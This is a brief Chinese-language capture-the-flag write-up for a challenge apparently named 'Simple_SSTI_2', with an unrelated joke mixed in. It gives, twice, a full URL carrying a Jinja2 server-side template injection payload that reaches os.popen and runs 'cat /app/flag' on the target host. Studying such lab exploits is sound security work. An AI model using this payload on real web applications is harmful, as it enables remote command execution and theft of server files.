先用简单的语句测试下,可以返回运算结果
再执行系统命令find找到flag文件后,直接cat
http://114.67.246.176:13466/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read() }}
Simple_SSTI_2
奶奶问孙子:4+1等于几 孙子说:等于6-1。 奶奶说:你明明知道答案,为什么不说? 孙子说:年轻人不讲5的……..
http://114.67.246.176:13466/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read() }}